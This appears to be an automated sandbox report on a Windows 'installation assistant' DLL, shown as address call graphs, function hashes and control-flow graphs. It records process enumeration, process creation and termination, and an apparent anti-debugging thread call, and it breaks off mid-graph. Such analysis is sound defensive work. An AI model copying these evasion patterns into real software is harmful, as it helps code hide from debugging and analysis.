6c2349d5 SetLastError 67257->67262 67260 6c236b23 __Getctype 6 API calls 67258->67260 67261 6c2349ed 67259->67261 67260->67257 67261->67262 67263 6c2349f1 67261->67263 67269 6c234a63 67262->67269 67270 6c234a69 67262->67270 67264 6c2371e5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 67263->67264 67266 6c2349fd 67264->67266 67267 6c234a05 67266->67267 67268 6c234a1c 67266->67268 67273 6c236b62 __Getctype 6 API calls 67267->67273 67272 6c236b62 __Getctype 6 API calls 67268->67272 67269->67245 67269->67248 67271 6c230ac9 __Getctype 35 API calls 67270->67271 67274 6c234a6e 67271->67274 67275 6c234a28 67272->67275 67276 6c234a13 67273->67276 67277 6c234a3d 67275->67277 67278 6c234a2c 67275->67278 67280 6c2347bb _free HeapFree GetLastError 67276->67280 67282 6c2347bb _free HeapFree GetLastError 67277->67282 67279 6c236b62 __Getctype 6 API calls 67278->67279 67279->67276 67281 6c234a19 67280->67281 67281->67262 67282->67281 67283->67184 67284->67190 67286 6c23b9cd __wsopen_s 67285->67286 67294 6c241990 EnterCriticalSection 67286->67294 67288 6c23b9db 67289 6c23b925 __wsopen_s 21 API calls 67288->67289 67290 6c23ba08 67288->67290 67289->67290 67295 6c23ba41 LeaveCriticalSection __wsopen_s 67290->67295 67292 6c23ba2a 67292->67196 67293->67196 67294->67288 67295->67292 67296->66795 67297->66796 67298->66795 67299->66795 67300->66795 67302 6c0f022e 67301->67302 67303 6c0c70c4 67302->67303 67308 6c2317db 67302->67308 67303->66807 67305->66808 67306->66810 67307->66812 67309 6c231806 67308->67309 67310 6c2317e9 67308->67310 67309->67302 67310->67309 67311 6c23180a 67310->67311 67313 6c2317f6 67310->67313 67316 6c231a02 67311->67316 67324 6c230120 18 API calls __fassign 67313->67324 67317 6c231a0e __wsopen_s 67316->67317 67325 6c22c5a9 EnterCriticalSection 67317->67325 67319 6c231a1c 67326 6c2319bf 67319->67326 67323 6c23183c 67323->67302 67324->67309 67325->67319 67334 6c2385a6 67326->67334 67332 6c2319f9 67333 6c231a51 LeaveCriticalSection 67332->67333 67333->67323 67335 6c239c60 18 API calls 67334->67335 67336 6c2385b7 67335->67336 67337 6c2419e5 __wsopen_s 18 API calls 67336->67337 67339 6c2385bd __wsopen_s 67337->67339 67338 6c2319d3 67341 6c23183e 67338->67341 67339->67338 67351 6c2347bb HeapFree GetLastError _free 67339->67351 67343 6c231850 67341->67343 67345 6c23186e 67341->67345 67342 6c23185e 67352 6c230120 18 API calls __fassign 67342->67352 67343->67342 67343->67345 67348 6c231886 _Yarn 67343->67348 67350 6c238659 62 API calls 67345->67350 67346 6c230cb9 62 API calls 67346->67348 67347 6c239c60 18 API calls 67347->67348 67348->67345 67348->67346 67348->67347 67349 6c23bb6c __wsopen_s 62 API calls 67348->67349 67349->67348 67350->67332 67351->67338 67352->67345 67354 6c226025 67353->67354 67355 6c0f2020 52 API calls 67354->67355 67356 6c2260c6 67355->67356 67357 6c226a43 std::_Facet_Register 4 API calls 67356->67357 67358 6c2260fe 67357->67358 67359 6c227327 43 API calls 67358->67359 67360 6c226112 67359->67360 67361 6c0f1d90 89 API calls 67360->67361 67362 6c2261bb 67361->67362 67363 6c2261ec 67362->67363 67405 6c0f2250 30 API calls 67362->67405 67363->66828 67365 6c226226 67406 6c0f26e0 24 API calls 4 library calls 67365->67406 67367 6c226238 67407 6c229379 RaiseException 67367->67407 67369 6c22624d 67370 6c0ee010 67 API calls 67369->67370 67371 6c22625f 67370->67371 67371->66828 67373 6c22638d 67372->67373 67408 6c2265a0 67373->67408 67375 6c22647c 67375->66834 67378 6c2263a5 67378->67375 67426 6c0f2250 30 API calls 67378->67426 67427 6c0f26e0 24 API calls 4 library calls 67378->67427 67428 6c229379 RaiseException 67378->67428 67381 6c10203f 67380->67381 67382 6c102053 67381->67382 67437 6c0f3560 32 API calls std::_Xinvalid_argument 67381->67437 67385 6c10210e 67382->67385 67439 6c0f2250 30 API calls 67382->67439 67440 6c0f26e0 24 API calls 4 library calls 67382->67440 67441 6c229379 RaiseException 67382->67441 67388 6c102121 67385->67388 67438 6c0f37e0 32 API calls std::_Xinvalid_argument 67385->67438 67388->66834 67391 6c225b9e 67390->67391 67394 6c225bd1 67390->67394 67392 6c0f01f0 64 API calls 67391->67392 67395 6c225bc4 67392->67395 67393 6c225c83 67393->66838 67394->67393 67442 6c0f2250 30 API calls 67394->67442 67397 6c230b18 67 API calls 67395->67397 67397->67394 67398 6c225cae 67443 6c0f2340 24 API calls 67398->67443 67400 6c225cbe 67444 6c229379 RaiseException 67400->67444 67402 6c225cc9 67403 6c0ee010 67 API calls 67402->67403 67404 6c225d22 std::ios_base::_Ios_base_dtor 67403->67404 67404->66838 67405->67365 67406->67367 67407->67369 67409 6c226608 67408->67409 67410 6c2265dc 67408->67410 67416 6c226619 67409->67416 67429 6c0f3560 32 API calls std::_Xinvalid_argument 67409->67429 67411 6c226601 67410->67411 67431 6c0f2250 30 API calls 67410->67431 67411->67378 67414 6c2267e8 67432 6c0f2340 24 API calls 67414->67432 67416->67411 67430 6c0f2f60 42 API calls 4 library calls 67416->67430 67417 6c2267f7 67433 6c229379 RaiseException 67417->67433 67421 6c226827 67435 6c0f2340 24 API calls 67421->67435 67423 6c22683d 67436 6c229379 RaiseException 67423->67436 67425 6c226653 67425->67411 67434 6c0f2250 30 API calls 67425->67434 67426->67378 67427->67378 67428->67378 67429->67416 67430->67425 67431->67414 67432->67417 67433->67425 67434->67421 67435->67423 67436->67411 67437->67382 67438->67388 67439->67382 67440->67382 67441->67382 67442->67398 67443->67400 67444->67402 67445 6c0b4a27 67449 6c0b4a5d _strlen 67445->67449 67446 6c0c639e 67536 6c230130 18 API calls 2 library calls 67446->67536 67447 6c0b5b58 67451 6c226a43 std::_Facet_Register 4 API calls 67447->67451 67448 6c0b5b6f 67452 6c226a43 std::_Facet_Register 4 API calls 67448->67452 67449->67446 67449->67447 67449->67448 67453 6c0b5b09 _Yarn 67449->67453 67451->67453 67452->67453 67454 6c21aec0 2 API calls 67453->67454 67456 6c0b5bad std::ios_base::_Ios_base_dtor 67454->67456 67455 6c224ff0 4 API calls 67465 6c0b61cb _strlen 67455->67465 67456->67446 67456->67455 67459 6c0b9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 67456->67459 67457 6c226a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 67457->67459 67458 6c21aec0 2 API calls 67458->67459 67459->67446 67459->67457 67459->67458 67460 6c0ba292 Sleep 67459->67460 67478 6c0be619 67459->67478 67477 6c0b9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 67460->67477 67461 6c0b660d 67463 6c226a43 std::_Facet_Register 4 API calls 67461->67463 67462 6c0b6624 67464 6c226a43 std::_Facet_Register 4 API calls 67462->67464 67469 6c0b65bc _Yarn _strlen 67463->67469 67464->67469 67465->67446 67465->67461 67465->67462 67465->67469 67466 6c0c63b2 67537 6c0a15e0 18 API calls std::ios_base::_Ios_base_dtor 67466->67537 67467 6c0b9bbd GetCurrentProcess TerminateProcess 67467->67459 67469->67466 67471 6c0b6989 67469->67471 67472 6c0b6970 67469->67472 67475 6c0b6920 _Yarn 67469->67475 67470 6c0c64f8 67474 6c226a43 std::_Facet_Register 4 API calls 67471->67474 67473 6c226a43 std::_Facet_Register 4 API calls 67472->67473 67473->67475 67474->67475 67476 6c225960 104 API calls 67475->67476 67480 6c0b69d6 std::ios_base::_Ios_base_dtor _strlen 67476->67480 67477->67446 67477->67459 67477->67466 67477->67467 67495 6c226a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 67477->67495 67525 6c225960 104 API calls 67477->67525 67535 6c224ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 67477->67535 67479 6c0bf243 CreateFileA 67478->67479 67490 6c0bf2a7 67479->67490 67480->67446 67481 6c0b6dbb 67480->67481 67482 6c0b6dd2 67480->67482 67494 6c0b6d69 _Yarn _strlen 67480->67494 67483 6c226a43 std::_Facet_Register 4 API calls 67481->67483 67485 6c226a43 std::_Facet_Register 4 API calls 67482->67485 67483->67494 67484 6c0c02ca 67485->67494 67486 6c0b7440 67489 6c226a43 std::_Facet_Register 4 API calls 67486->67489 67487 6c0b7427 67488 6c226a43 std::_Facet_Register 4 API calls 67487->67488 67491 6c0b73da _Yarn 67488->67491 67489->67491 67490->67484 67492 6c0c02ac GetCurrentProcess TerminateProcess 67490->67492 67493 6c225960 104 API calls 67491->67493 67492->67484 67496 6c0b748d std::ios_base::_Ios_base_dtor _strlen 67493->67496 67494->67466 67494->67486 67494->67487 67494->67491 67495->67477 67496->67446 67497 6c0b79a8 67496->67497 67498 6c0b7991 67496->67498 67505 6c0b7940 _Yarn _strlen 67496->67505 67500 6c226a43 std::_Facet_Register 4 API calls 67497->67500 67499 6c226a43 std::_Facet_Register 4 API calls 67498->67499 67499->67505 67500->67505 67501 6c0b7dc9 67503 6c226a43 std::_Facet_Register 4 API calls 67501->67503 67502 6c0b7de2 67504 6c226a43 std::_Facet_Register 4 API calls 67502->67504 67506 6c0b7d7c _Yarn 67503->67506 67504->67506 67505->67466 67505->67501 67505->67502 67505->67506 67507 6c225960 104 API calls 67506->67507 67508 6c0b7e2f std::ios_base::_Ios_base_dtor _strlen 67507->67508 67508->67446 67509 6c0b85a8 67508->67509 67510 6c0b85bf 67508->67510 67513 6c0b8556 _Yarn _strlen 67508->67513 67512 6c226a43 std::_Facet_Register 4 API calls 67509->67512 67511 6c226a43 std::_Facet_Register 4 API calls 67510->67511 67511->67513 67512->67513 67513->67466 67514 6c0b896a 67513->67514 67515 6c0b8983 67513->67515 67518 6c0b891d _Yarn 67513->67518 67516 6c226a43 std::_Facet_Register 4 API calls 67514->67516 67517 6c226a43 std::_Facet_Register 4 API calls 67515->67517 67516->67518 67517->67518 67519 6c225960 104 API calls 67518->67519 67522 6c0b89d0 std::ios_base::_Ios_base_dtor _strlen 67519->67522 67520 6c0b8f1f 67523 6c226a43 std::_Facet_Register 4 API calls 67520->67523 67521 6c0b8f36 67524 6c226a43 std::_Facet_Register 4 API calls 67521->67524 67522->67446 67522->67520 67522->67521 67526 6c0b8ecd _Yarn _strlen 67522->67526 67523->67526 67524->67526 67525->67477 67526->67466 67527 6c0b936d 67526->67527 67528 6c0b9354 67526->67528 67531 6c0b9307 _Yarn 67526->67531 67530 6c226a43 std::_Facet_Register 4 API calls 67527->67530 67529 6c226a43 std::_Facet_Register 4 API calls 67528->67529 67529->67531 67530->67531 67532 6c225960 104 API calls 67531->67532 67534 6c0b93ba std::ios_base::_Ios_base_dtor 67532->67534 67533 6c224ff0 4 API calls 67533->67459 67534->67446 67534->67533 67535->67477 67537->67470 67538 6c22ef3f 67539 6c22ef4b __wsopen_s 67538->67539 67540 6c22ef52 GetLastError ExitThread 67539->67540 67541 6c22ef5f 67539->67541 67542 6c2349b2 __Getctype 37 API calls 67541->67542 67543 6c22ef64 67542->67543 67550 6c239d66 67543->67550 67547 6c22ef7b 67556 6c22eeaa 16 API calls 2 library calls 67547->67556 67549 6c22ef9d 67551 6c22ef6f 67550->67551 67552 6c239d78 GetPEB 67550->67552 67551->67547 67555 6c236d6f 5 API calls std::_Lockit::_Lockit 67551->67555 67552->67551 67553 6c239d8b 67552->67553 67557 6c236e18 5 API calls std::_Lockit::_Lockit 67553->67557 67555->67547 67556->67549 67557->67551

                              Executed Functions

                              Function 6C0A4754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 3bb6c30176b09bf77ed942acb5593505aae0025439673284a3c277be0d4756fa
                              • Instruction ID: 084e4ed551efe96f837bce5a5e19af6380a319fb4aec19557862a962ac3cbe25
                              • Opcode Fuzzy Hash: 3bb6c30176b09bf77ed942acb5593505aae0025439673284a3c277be0d4756fa
                              • Instruction Fuzzy Hash: 10742671644B018FC728CF68C8D0795B7F3EF95318B598A2DC0A68BA96E735B54BCB40
                              Function 6C0B4A27 Relevance: 61.3, APIs: 25, Strings: 3, Instructions: 12265COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: e976bb2726d48805f4e8c8f1029d4ff4385766d85c58de127118ef07b17e6391
                              • Instruction ID: ccf8b9276bfe2dd99f6e2bb7ecdee9d0c7bb5bac058551210858f9cd87219a31
                              • Opcode Fuzzy Hash: e976bb2726d48805f4e8c8f1029d4ff4385766d85c58de127118ef07b17e6391
                              • Instruction Fuzzy Hash: 81344871644B018FC728CF28C8D0B96B7F3EF95318B598A6DC0A69BB55E735B50ACB40
                              Function 6C225240 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7677 6c225240-6c225275 CreateToolhelp32Snapshot 7678 6c2252a0-6c2252a9 7677->7678 7679 6c2252e0-6c2252e5 7678->7679 7680 6c2252ab-6c2252b0 7678->7680 7681 6c225377-6c2253a1 call 6c232c05 7679->7681 7682 6c2252eb-6c2252f0 7679->7682 7683 6c2252b2-6c2252b7 7680->7683 7684 6c225315-6c22531a 7680->7684 7681->7678 7685 6c2252f2-6c2252f7 7682->7685 7686 6c225277-6c225292 CloseHandle 7682->7686 7690 6c225334-6c22535d call 6c22b920 Process32FirstW 7683->7690 7691 6c2252b9-6c2252be 7683->7691 7687 6c225320-6c225332 Process32NextW 7684->7687 7688 6c2253a6-6c2253ab 7684->7688 7685->7678 7692 6c2252f9-6c225313 7685->7692 7686->7678 7693 6c225362-6c225372 7687->7693 7688->7678 7696 6c2253b1-6c2253bf 7688->7696 7690->7693 7691->7678 7697 6c2252c0-6c2252d1 7691->7697 7692->7678 7693->7678 7697->7678
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C22524E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: 34e9c21f48b891e1fa07d75ffb0f66fcd430c47b452d59ffe03898a11bddccb3
                              • Instruction ID: 457402c7d6e39299bdb13b1f3cf328dcec2585825da3fe33ff1e911cd5fd1a39
                              • Opcode Fuzzy Hash: 34e9c21f48b891e1fa07d75ffb0f66fcd430c47b452d59ffe03898a11bddccb3
                              • Instruction Fuzzy Hash: 8B315E756083059FD7109F28C888B1ABBF4AF99745F508A3DF898C73A4D379D8488B52
                              Function 6C0A3886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7821 6c0a3886-6c0a388e 7822 6c0a3970-6c0a397d 7821->7822 7823 6c0a3894-6c0a3896 7821->7823 7825 6c0a397f-6c0a3989 7822->7825 7826 6c0a39f1-6c0a39f8 7822->7826 7823->7822 7824 6c0a389c-6c0a38b9 7823->7824 7827 6c0a38c0-6c0a38c1 7824->7827 7825->7824 7828 6c0a398f-6c0a3994 7825->7828 7829 6c0a39fe-6c0a3a03 7826->7829 7830 6c0a3ab5-6c0a3aba 7826->7830 7833 6c0a395e 7827->7833 7835 6c0a399a-6c0a399f 7828->7835 7836 6c0a3b16-6c0a3b18 7828->7836 7831 6c0a3a09-6c0a3a2f 7829->7831 7832 6c0a38d2-6c0a38d4 7829->7832 7830->7824 7834 6c0a3ac0-6c0a3ac7 7830->7834 7837 6c0a38f8-6c0a3955 7831->7837 7838 6c0a3a35-6c0a3a3a 7831->7838 7839 6c0a3957-6c0a395c 7832->7839 7840 6c0a3960-6c0a3964 7833->7840 7834->7827 7841 6c0a3acd-6c0a3ad6 7834->7841 7842 6c0a383b-6c0a3855 call 6c1f1470 call 6c1f1480 7835->7842 7843 6c0a39a5-6c0a39bf 7835->7843 7836->7827 7837->7839 7844 6c0a3b1d-6c0a3b22 7838->7844 7845 6c0a3a40-6c0a3a57 7838->7845 7839->7833 7847 6c0a396a 7840->7847 7848 6c0a3860-6c0a3885 7840->7848 7841->7836 7849 6c0a3ad8-6c0a3aeb 7841->7849 7842->7848 7850 6c0a3a5a-6c0a3a5d 7843->7850 7856 6c0a3b49-6c0a3b50 7844->7856 7857 6c0a3b24-6c0a3b44 7844->7857 7845->7850 7853 6c0a3ba1-6c0a3bb6 7847->7853 7848->7821 7849->7837 7854 6c0a3af1-6c0a3af8 7849->7854 7851 6c0a3aa9-6c0a3ab0 7850->7851 7851->7840 7859 6c0a3bc0-6c0a3bda call 6c1f1470 call 6c1f1480 7853->7859 7861 6c0a3afa-6c0a3aff 7854->7861 7862 6c0a3b62-6c0a3b85 7854->7862 7856->7827 7858 6c0a3b56-6c0a3b5d 7856->7858 7857->7851 7858->7840 7872 6c0a3be0-6c0a3bfe 7859->7872 7861->7839 7862->7837 7865 6c0a3b8b 7862->7865 7865->7853 7875 6c0a3e7b 7872->7875 7876 6c0a3c04-6c0a3c11 7872->7876 7877 6c0a3e81-6c0a3ee0 call 6c0a3750 GetCurrentThread NtSetInformationThread 7875->7877 7878 6c0a3ce0-6c0a3cea 7876->7878 7879 6c0a3c17-6c0a3c20 7876->7879 7896 6c0a3eea-6c0a3f04 call 6c1f1470 call 6c1f1480 7877->7896 7880 6c0a3d3a-6c0a3d3c 7878->7880 7881 6c0a3cec-6c0a3d0c 7878->7881 7883 6c0a3c26-6c0a3c2d 7879->7883 7884 6c0a3dc5 7879->7884 7889 6c0a3d3e-6c0a3d45 7880->7889 7890 6c0a3d70-6c0a3d8d 7880->7890 7888 6c0a3d90-6c0a3d95 7881->7888 7885 6c0a3dc3 7883->7885 7886 6c0a3c33-6c0a3c3a 7883->7886 7887 6c0a3dc6 7884->7887 7885->7884 7892 6c0a3c40-6c0a3c5b 7886->7892 7893 6c0a3e26-6c0a3e2b 7886->7893 7894 6c0a3dc8-6c0a3dcc 7887->7894 7897 6c0a3dba-6c0a3dc1 7888->7897 7898 6c0a3d97-6c0a3db8 7888->7898 7895 6c0a3d50-6c0a3d57 7889->7895 7890->7888 7899 6c0a3e1b-6c0a3e24 7892->7899 7900 6c0a3c7b-6c0a3cd0 7893->7900 7901 6c0a3e31 7893->7901 7894->7872 7902 6c0a3dd2 7894->7902 7895->7887 7915 6c0a3f75-6c0a3fa1 7896->7915 7897->7885 7904 6c0a3dd7-6c0a3ddc 7897->7904 7898->7884 7899->7894 7905 6c0a3e76-6c0a3e79 7899->7905 7900->7895 7901->7859 7902->7905 7907 6c0a3dde-6c0a3e17 7904->7907 7908 6c0a3e36-6c0a3e3d 7904->7908 7905->7877 7907->7899 7909 6c0a3e3f-6c0a3e5a 7908->7909 7910 6c0a3e5c-6c0a3e5f 7908->7910 7909->7899 7910->7900 7913 6c0a3e65-6c0a3e69 7910->7913 7913->7894 7913->7905 7919 6c0a3fa3-6c0a3fa8 7915->7919 7920 6c0a4020-6c0a4026 7915->7920 7921 6c0a3fae-6c0a3fcf 7919->7921 7922 6c0a407c-6c0a4081 7919->7922 7923 6c0a402c-6c0a403c 7920->7923 7924 6c0a3f06-6c0a3f35 7920->7924 7925 6c0a40aa-6c0a40ae 7921->7925 7922->7925 7926 6c0a4083-6c0a408a 7922->7926 7928 6c0a403e-6c0a4058 7923->7928 7929 6c0a40b3-6c0a40b8 7923->7929 7927 6c0a3f38-6c0a3f61 7924->7927 7931 6c0a3f6b-6c0a3f6f 7925->7931 7926->7927 7930 6c0a4090 7926->7930 7933 6c0a3f64-6c0a3f67 7927->7933 7934 6c0a405a-6c0a4063 7928->7934 7929->7921 7932 6c0a40be-6c0a40c9 7929->7932 7930->7896 7935 6c0a40a7 7930->7935 7931->7915 7932->7925 7936 6c0a40cb-6c0a40d4 7932->7936 7937 6c0a3f69 7933->7937 7938 6c0a4069-6c0a406c 7934->7938 7939 6c0a40f5-6c0a413f 7934->7939 7935->7925 7936->7935 7942 6c0a40d6-6c0a40f0 7936->7942 7937->7931 7940 6c0a4072-6c0a4077 7938->7940 7941 6c0a4144-6c0a414b 7938->7941 7939->7937 7940->7933 7941->7931 7942->7934
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1ad7069380a8e4c9bdf868c9d7ccfd3cecb3aafce27ba40e486e6975387efafb
                              • Instruction ID: 3347cb8e765c9f6eae2040279c95ccff79a729c75217e70635643e5ad85bd8cb
                              • Opcode Fuzzy Hash: 1ad7069380a8e4c9bdf868c9d7ccfd3cecb3aafce27ba40e486e6975387efafb
                              • Instruction Fuzzy Hash: C532C132245B018FC324CFA8C890795B7E3EFD93147698A6CC0EA5BA96D775B44BCB50
                              Function 6C0A3A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7969 6c0a3a6a-6c0a3a85 7970 6c0a3a87-6c0a3aa7 7969->7970 7971 6c0a3aa9-6c0a3ab0 7970->7971 7972 6c0a3960-6c0a3964 7971->7972 7973 6c0a396a 7972->7973 7974 6c0a3860-6c0a388e 7972->7974 7975 6c0a3ba1-6c0a3bb6 7973->7975 7983 6c0a3970-6c0a397d 7974->7983 7984 6c0a3894-6c0a3896 7974->7984 7977 6c0a3bc0-6c0a3bda call 6c1f1470 call 6c1f1480 7975->7977 7991 6c0a3be0-6c0a3bfe 7977->7991 7988 6c0a397f-6c0a3989 7983->7988 7989 6c0a39f1-6c0a39f8 7983->7989 7984->7983 7986 6c0a389c-6c0a38b9 7984->7986 7990 6c0a38c0-6c0a38c1 7986->7990 7988->7986 7992 6c0a398f-6c0a3994 7988->7992 7993 6c0a39fe-6c0a3a03 7989->7993 7994 6c0a3ab5-6c0a3aba 7989->7994 7997 6c0a395e 7990->7997 8013 6c0a3e7b 7991->8013 8014 6c0a3c04-6c0a3c11 7991->8014 8000 6c0a399a-6c0a399f 7992->8000 8001 6c0a3b16-6c0a3b18 7992->8001 7995 6c0a3a09-6c0a3a2f 7993->7995 7996 6c0a38d2-6c0a38d4 7993->7996 7994->7986 7998 6c0a3ac0-6c0a3ac7 7994->7998 8002 6c0a38f8-6c0a3955 7995->8002 8003 6c0a3a35-6c0a3a3a 7995->8003 8004 6c0a3957-6c0a395c 7996->8004 7997->7972 7998->7990 8005 6c0a3acd-6c0a3ad6 7998->8005 8007 6c0a383b-6c0a3855 call 6c1f1470 call 6c1f1480 8000->8007 8008 6c0a39a5-6c0a39bf 8000->8008 8001->7990 8002->8004 8009 6c0a3b1d-6c0a3b22 8003->8009 8010 6c0a3a40-6c0a3a57 8003->8010 8004->7997 8005->8001 8012 6c0a3ad8-6c0a3aeb 8005->8012 8007->7974 8015 6c0a3a5a-6c0a3a5d 8008->8015 8019 6c0a3b49-6c0a3b50 8009->8019 8020 6c0a3b24-6c0a3b44 8009->8020 8010->8015 8012->8002 8018 6c0a3af1-6c0a3af8 8012->8018 8017 6c0a3e81-6c0a3ee0 call 6c0a3750 GetCurrentThread NtSetInformationThread 8013->8017 8021 6c0a3ce0-6c0a3cea 8014->8021 8022 6c0a3c17-6c0a3c20 8014->8022 8015->7971 8045 6c0a3eea-6c0a3f04 call 6c1f1470 call 6c1f1480 8017->8045 8028 6c0a3afa-6c0a3aff 8018->8028 8029 6c0a3b62-6c0a3b85 8018->8029 8019->7990 8023 6c0a3b56-6c0a3b5d 8019->8023 8020->7970 8024 6c0a3d3a-6c0a3d3c 8021->8024 8025 6c0a3cec-6c0a3d0c 8021->8025 8030 6c0a3c26-6c0a3c2d 8022->8030 8031 6c0a3dc5 8022->8031 8023->7972 8037 6c0a3d3e-6c0a3d45 8024->8037 8038 6c0a3d70-6c0a3d8d 8024->8038 8036 6c0a3d90-6c0a3d95 8025->8036 8028->8004 8029->8002 8035 6c0a3b8b 8029->8035 8032 6c0a3dc3 8030->8032 8033 6c0a3c33-6c0a3c3a 8030->8033 8034 6c0a3dc6 8031->8034 8032->8031 8041 6c0a3c40-6c0a3c5b 8033->8041 8042 6c0a3e26-6c0a3e2b 8033->8042 8043 6c0a3dc8-6c0a3dcc 8034->8043 8035->7975 8046 6c0a3dba-6c0a3dc1 8036->8046 8047 6c0a3d97-6c0a3db8 8036->8047 8044 6c0a3d50-6c0a3d57 8037->8044 8038->8036 8048 6c0a3e1b-6c0a3e24 8041->8048 8049 6c0a3c7b-6c0a3cd0 8042->8049 8050 6c0a3e31 8042->8050 8043->7991 8051 6c0a3dd2 8043->8051 8044->8034 8064 6c0a3f75-6c0a3fa1 8045->8064 8046->8032 8053 6c0a3dd7-6c0a3ddc 8046->8053 8047->8031 8048->8043 8054 6c0a3e76-6c0a3e79 8048->8054 8049->8044 8050->7977 8051->8054 8056 6c0a3dde-6c0a3e17 8053->8056 8057 6c0a3e36-6c0a3e3d 8053->8057 8054->8017 8056->8048 8058 6c0a3e3f-6c0a3e5a 8057->8058 8059 6c0a3e5c-6c0a3e5f 8057->8059 8058->8048 8059->8049 8062 6c0a3e65-6c0a3e69 8059->8062 8062->8043 8062->8054 8068 6c0a3fa3-6c0a3fa8 8064->8068 8069 6c0a4020-6c0a4026 8064->8069 8070 6c0a3fae-6c0a3fcf 8068->8070 8071 6c0a407c-6c0a4081 8068->8071 8072 6c0a402c-6c0a403c 8069->8072 8073 6c0a3f06-6c0a3f35 8069->8073 8074 6c0a40aa-6c0a40ae 8070->8074 8071->8074 8075 6c0a4083-6c0a408a 8071->8075 8077 6c0a403e-6c0a4058 8072->8077 8078 6c0a40b3-6c0a40b8 8072->8078 8076 6c0a3f38-6c0a3f61 8073->8076 8080 6c0a3f6b-6c0a3f6f 8074->8080 8075->8076 8079 6c0a4090 8075->8079 8082 6c0a3f64-6c0a3f67 8076->8082 8083 6c0a405a-6c0a4063 8077->8083 8078->8070 8081 6c0a40be-6c0a40c9 8078->8081 8079->8045 8084 6c0a40a7 